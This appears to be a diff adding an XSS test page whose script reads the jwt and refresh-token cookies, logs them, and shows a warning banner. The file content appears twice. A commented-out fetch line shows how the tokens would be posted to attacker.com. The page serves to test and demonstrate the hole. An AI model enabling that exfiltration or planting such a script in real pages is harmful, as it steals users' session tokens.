thesandybridge · October 24, 2025 12:11
diff --git a/testing-xss.html b/testing-xss.html
 <!-- malicious-test.html -->
 <!DOCTYPE html>
 <html>
 <head>
  <title>Innocent Looking Page</title>
 </head>
 <body>
  <h1>This looks like normal content!</h1>
  <p>But it's actually stealing your cookies...</p>

  <script>
    // This is what an attacker would do
    console.log("🚨 ATTACK SIMULATION 🚨");
    console.log("Stolen cookies:", document.cookie);

    // Parse out the tokens
    const jwt = document.cookie
      .split('; ')
      .find(row => row.startsWith('jwt='))
      ?.split('=')[1];

    const jwtRT = document.cookie
      .split('; ')
      .find(row => row.startsWith('jwtRT='))
      ?.split('=')[1];

    console.log("Access Token (jwt):", jwt);
    console.log("Refresh Token (jwtRT):", jwtRT);

    // In a real attack, this would send to attacker's server:
    // fetch('https://attacker.com/steal', {
    //   method: 'POST',
    //   body: JSON.stringify({ jwt, jwtRT, url: window.location.href })
    // });

    console.log("✓ Tokens successfully stolen!");
    console.log("In a real attack, these would be sent to attacker's server.");

    // Show visual alert in the page
    document.body.innerHTML += `
      <div style="
        position: fixed;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        background: red;
        color: white;
        padding: 40px;
        border-radius: 10px;
        font-size: 24px;
        z-index: 99999;
        text-align: center;
        box-shadow: 0 0 50px rgba(0,0,0,0.5);
      ">
        <h2>🚨 SECURITY VULNERABILITY DETECTED 🚨</h2>
        <p>Your authentication tokens were just stolen!</p>
        <p>Check the console for details.</p>
      </div>
    `;
  </script>
 </body>
 </html>
	<!-- malicious-test.html -->
	<!DOCTYPE html>
	<html>
	<head>
	<title>Innocent Looking Page</title>
	</head>
	<body>
	<h1>This looks like normal content!</h1>
	<p>But it's actually stealing your cookies...</p>

	<script>
	// This is what an attacker would do
	console.log("🚨 ATTACK SIMULATION 🚨");
	console.log("Stolen cookies:", document.cookie);

	// Parse out the tokens
	const jwt = document.cookie
	.split('; ')
	.find(row => row.startsWith('jwt='))
	?.split('=')[1];

	const jwtRT = document.cookie
	.split('; ')
	.find(row => row.startsWith('jwtRT='))
	?.split('=')[1];

	console.log("Access Token (jwt):", jwt);
	console.log("Refresh Token (jwtRT):", jwtRT);

	// In a real attack, this would send to attacker's server:
	// fetch('https://attacker.com/steal', {
	// method: 'POST',
	// body: JSON.stringify({ jwt, jwtRT, url: window.location.href })
	// });

	console.log("✓ Tokens successfully stolen!");
	console.log("In a real attack, these would be sent to attacker's server.");

	// Show visual alert in the page
	document.body.innerHTML += `
	<div style="
	position: fixed;
	top: 50%;
	left: 50%;
	transform: translate(-50%, -50%);
	background: red;
	color: white;
	padding: 40px;
	border-radius: 10px;
	font-size: 24px;
	z-index: 99999;
	text-align: center;
	box-shadow: 0 0 50px rgba(0,0,0,0.5);
	">
	<h2>🚨 SECURITY VULNERABILITY DETECTED 🚨</h2>
	<p>Your authentication tokens were just stolen!</p>
	<p>Check the console for details.</p>
	</div>
	`;
	</script>
	</body>
	</html>